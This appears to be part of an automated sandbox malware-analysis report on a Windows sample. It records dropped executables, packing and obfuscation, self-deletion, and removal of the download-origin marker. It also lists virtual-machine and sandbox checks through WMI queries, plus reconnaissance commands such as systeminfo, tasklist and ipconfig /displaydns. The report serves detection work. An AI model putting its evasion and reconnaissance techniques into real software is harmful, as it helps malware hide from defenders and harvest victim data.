Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\ipconfig.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\ROUTE.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\ROUTE.EXE	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\ROUTE.EXE	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\ROUTE.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Unpacked PE file: 0.2.OCYe9qcxiM.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\hehcrfb	Unpacked PE file: 4.2.hehcrfb.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Unpacked PE file: 7.2.4470.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\fihcrfb	Unpacked PE file: 8.2.fihcrfb.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\354F.exe

Code function: 9_2_00007FF780B678EC LoadLibraryA,GetProcAddress,GetCurrentProcess,IsWow64Process,

9_2_00007FF780B678EC

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_004014D9 pushad ; ret	0_2_004014E9
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_004031DB push eax; ret	0_2_004032AB
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00795033 pushfd ; iretd	0_2_00795034
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00794536 push B63524ADh; retn 001Fh	0_2_0079456D
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00796193 push esp; ret	0_2_00796195
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_02161540 pushad ; ret	0_2_02161550
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_004014D9 pushad ; ret	4_2_004014E9
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_004031DB push eax; ret	4_2_004032AB
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_005F1540 pushad ; ret	4_2_005F1550
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_0063E558 pushad ; retf	4_2_0063E5CD
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_0064522B push esp; ret	4_2_0064522D
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_006435CE push B63524ADh; retn 001Fh	4_2_00643605
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_006440CB pushfd ; iretd	4_2_006440CC
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_0040100B push esi; ret	7_2_0040100C
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_0040280E push esp; ret	7_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_0040281F push esp; ret	7_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_00402822 push esp; ret	7_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_00401328 push edi; retf	7_2_0040132A
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004027ED push esp; ret	7_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004027FB push esp; ret	7_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_006D1313 push edi; retf	7_2_006D1314
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_006D0FFC push esi; ret	7_2_006D0FFD
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_006D2A81 push 9A832F1Fh; iretd	7_2_006D2A87
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_02161909 push esp; iretd	7_2_021619BF
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_02162854 push esp; ret	7_2_02162A2D
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_02162875 push esp; ret	7_2_02162A2D
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_02161072 push esi; ret	7_2_02161073
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_02162862 push esp; ret	7_2_02162A2D
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_02161386 push edi; retf	7_2_02161391
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_02162886 push esp; ret	7_2_02162A2D
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_02162889 push esp; ret	7_2_02162A2D

Source: OCYe9qcxiM.exe	Static PE information: section name: .text entropy: 7.489225566155988
Source: 4470.exe.2.dr	Static PE information: section name: .text entropy: 7.47627388301737
Source: hehcrfb.2.dr	Static PE information: section name: .text entropy: 7.489225566155988
Source: fihcrfb.2.dr	Static PE information: section name: .text entropy: 7.47627388301737

Persistence and Installation Behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns

Drops PE files

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\354F.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\4470.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\fihcrfb	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\hehcrfb	Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\hehcrfb			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\fihcrfb			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\ocye9qcxim.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\hehcrfb:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\fihcrfb:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Windows\SysWOW64\explorer.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\354F.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity WHERE ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}"
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, PNPDeviceID, Manufacturer, Description FROM Win32_PnPEntity WHERE ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}"

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\354F.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, MACAddress, ProductName, ServiceName, NetConnectionID FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter

Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)

Source: C:\Users\user\AppData\Local\Temp\354F.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_StartupCommand
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, Location, Command FROM Win32_StartupCommand

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	API/Special instruction interceptor: Address: 7FFBCB7AE814
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	API/Special instruction interceptor: Address: 7FFBCB7AD584
Source: C:\Users\user\AppData\Roaming\hehcrfb	API/Special instruction interceptor: Address: 7FFBCB7AE814
Source: C:\Users\user\AppData\Roaming\hehcrfb	API/Special instruction interceptor: Address: 7FFBCB7AD584
Source: C:\Users\user\AppData\Local\Temp\4470.exe	API/Special instruction interceptor: Address: 7FFBCB7AE814
Source: C:\Users\user\AppData\Local\Temp\4470.exe	API/Special instruction interceptor: Address: 7FFBCB7AD584
Source: C:\Users\user\AppData\Roaming\fihcrfb	API/Special instruction interceptor: Address: 7FFBCB7AE814
Source: C:\Users\user\AppData\Roaming\fihcrfb	API/Special instruction interceptor: Address: 7FFBCB7AD584

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: hehcrfb, 00000004.00000002.1809416780.000000000062E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOKR
Source: 4470.exe, 00000007.00000002.2067639306.00000000006BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\SysWOW64\explorer.exe

14_2_00C21016

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 450	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1872	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 613	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1556	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 891	Jump to behavior
